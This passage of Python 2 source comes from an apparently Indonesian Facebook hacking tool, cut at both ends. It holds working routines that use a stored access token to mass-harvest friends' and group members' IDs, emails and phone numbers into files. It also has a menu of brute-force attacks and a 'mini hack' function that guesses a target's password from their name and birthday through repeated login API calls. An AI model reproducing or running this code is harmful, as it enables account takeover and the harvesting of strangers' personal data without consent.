except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[✖] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Get ID Search"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Get group member ID"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Get group member email"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Get group member phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m Get email friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m10.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
os.system('reset')
print "\033[1;91mSegera"
keluar()
elif cuih =="4":
id_member_grup()
elif cuih =="5":
em_member_grup()
elif cuih =="6":
no_member_grup()
elif cuih =="7":
email()
elif cuih =="8":
emailfrom_teman()
elif cuih =="9":
nomor_hp()
elif cuih =="10":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM TEMAN #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(5000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM GRUP #####
def no_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member phone number \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
nomem.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(nomem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get phone number from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(nomem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL #####
def email():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/email_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
em.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(em))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(em))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/email_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM TEMAN #####
def emailfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend email from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emfromteman.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER #####
def nomor_hp():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mGet all friend number phone \033[1;97m...')
print 42*"\033[1;97m═"
url= "https://graph.facebook.com/me/friends?access_token="+toket
r =requests.get(url)
z=json.loads(r.text)
bz = open('out/nomer_teman.txt','w')
for n in z["data"]:
x = requests.get("https://graph.facebook.com/"+n['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hp))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hp))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/nomer_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### NOMER FROM TEMAN #####
def hpfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
a = json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend number from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/no_teman_from_teman.txt','w')
for i in a['data']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
hpfromteman.append(z['mobile_phone'])
bz.write(z['mobile_phone'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(hpfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['mobile_phone']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get number \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Number \033[1;91m: \033[1;97m%s"%(len(hpfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/no_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### MENU HACK #####
def menu_hack():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;93m║--\033[1;93m> \033[1;93m1.\033[1;94m Mini Hack Facebook(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m2.\033[1;94m Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m3.\033[1;94m Super Multi Bruteforce Facebook"
print "\033[1;93m║--\033[1;93m> \033[1;93m4.\033[1;94m BruteForce(\033[1;92mTarget\033[1;97m)"
print "\033[1;93m║--\033[1;93m> \033[1;93m5.\033[1;94m Yahoo Checker"
print "\033[1;93m║--\033[1;93m> \033[1;93m0.\033[1;94m Back"
print "║"
hack_pilih()
#----pilih
def hack_pilih():
hack = raw_input("\033[1;95m╚═\033[1;95mD \033[1;95m")
if hack=="":
print "\033[1;91m[!] Wrong input"
hack_pilih()
elif hack =="1":
mini()
elif hack =="2":
crack()
hasil()
elif hack =="3":
super()
elif hack =="4":
brute()
elif hack =="5":
menu_yahoo()
elif hack =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
hack_pilih()
##### MINI HF #####
def mini():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m[\033[1;91mINFO\033[1;97m] \033[1;91mThe target account must be friends\n with your account first!"
print 42*"\033[1;97m═"
try:
id = raw_input("\033[1;91m[+] \033[1;92mTarget ID \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
a = json.loads(r.text)
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+a['name']
jalan('\033[1;91m[+] \033[1;92mCheck \033[1;97m...')
time.sleep(2)
jalan('\033[1;91m[+] \033[1;92mOpen password \033[1;97m...')
time.sleep(2)
print 42*"\033[1;97m═"
pz1 = a['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz1
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz2
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz3
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pz4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
y = json.load(data)
if 'access_token' in y:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
if 'www.facebook.com' in y["error_msg"]:
print "\033[1;91m[+] \033[1;92mFound"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print "\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mName\033[1;97m : "+a['name']
print "\033[1;91m[➹] \033[1;92mUsername\033[1;97m : "+id
print "\033[1;91m[➹] \033[1;92mPassword\033[1;97m : "+pz4
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_hack()
else:
lahirs = a['birthday']
gaz = lahirs.replace('/', '')
pz5 = a['first_name']+gaz
